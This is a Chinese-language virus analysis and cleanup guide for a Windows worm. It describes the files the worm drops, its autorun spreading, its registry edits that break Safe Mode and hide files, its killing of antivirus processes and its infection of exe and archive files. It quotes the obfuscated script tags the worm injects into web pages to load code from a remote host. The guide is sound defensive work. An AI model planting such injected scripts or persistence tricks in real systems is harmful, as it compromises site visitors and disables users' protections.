技術細節
1.病毒運行後,衍生如下檔案或副本:
%systemroot%\system32\Com\LSASS.EXE
%systemroot%\system32\Com\netcfg.000
%systemroot%\system32\Com\netcfg.dll
%systemroot%\system32\Com\SMSS.EXE
C:\WINDOWS\system32\894729.log(6位隨機數字)
C:\894729.log(6位隨機數字)
C:\WINDOWS\system32\dnsq.dll
C:\WINDOWS\system32\ntfsus.exe
C:\Documents and Settings\All Users\「開始」選單\程式\啟動\~.exe(一定不要忘記)
或C:\Documents and Settings\用戶名\「開始」選單\程式\啟動\~.exe
各個盤下面生成pagefile.pif和autorun.inf檔案,達到通過移動存儲傳播的目的
2.添加啟動項目
C:\Documents and Settings\All Users\「開始」選單\程式\啟動\~.exe
3.通過查找某些ieframe和mozillauiwindowclass名關閉帶有某些關鍵字的IE視窗和火狐瀏覽器視窗
升級
還可能關閉帶有某些關鍵字的進程
如avast
4.刪除HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面所有啟動項目
5.刪除HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\
破壞安全模式
把HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden的值改為0x00000000
使得不能顯示隱藏檔案
6.查找檔案名稱中帶有360字樣的檔案 找到即在重啟後將其刪除
7.通過ping百度網站查看是否聯網
8.通過regsvr32.exe %systemroot%\system32\com\netcfg.dll /s註冊netcfg.dll
9.連線網路下載Stop.exe到system32資料夾 命名為ntfsus.exe
該病毒具有arp欺騙功能
10.感染exe檔案(部分感染)且會通過自解壓命令感染Rar和zip檔案中的exe檔案
被感染檔案運行後會釋放一個檔案名稱.log的檔案
11.感染htm html、asp、spx、php、jsp等網頁檔案 在其後面加入
{script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"}{/script}的代碼
感染.js檔案
在其尾部加入
document.write("{ScRiPt src=""%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70''}{/sCrIpT}")
的代碼
12.後台連線某些網站刷流量
清除辦法
(怕麻煩的話,可以直接使用磁碟機免疫工具
1.刪除以下檔案:
%systemroot%\system32\Com\LSASS.EXE
%systemroot%\system32\Com\netcfg.000
%systemroot%\system32\Com\netcfg.dll
%systemroot%\system32\Com\SMSS.EXE
C:\WINDOWS\system32\894729.log(6位隨機數字)
C:\894729.log(6位隨機數字)
C:\WINDOWS\system32\dnsq.dll
C:\WINDOWS\system32\ntfsus.exe
C:\Documents and Settings\All Users\「開始」選單\程式\啟動\~.exe
2.重啟計算機
打開sreng:系統修復 - Windows Shell/IE 全選 點擊修復
雙擊我的電腦,工具,資料夾選項,查看,單擊選取"顯示隱藏檔案或資料夾" 並清除"隱藏受保護的作業系統檔案(推薦)"前面的鉤。在提示確定更改時,單擊“是” 然後確定
點擊 選單欄下方的 資料夾按鈕(搜尋右邊的按鈕)
在左邊的資源管理器中單擊打開系統所在盤刪除
C:\pagefile.pif
c:\autorun.inf
在左邊的資源管理器中單擊打開其他盤
刪除pagefile.pif
autorun.inf
3.使用防毒軟體全盤防毒 修復被感染的exe檔案
4.修復被感染的htm等網頁檔案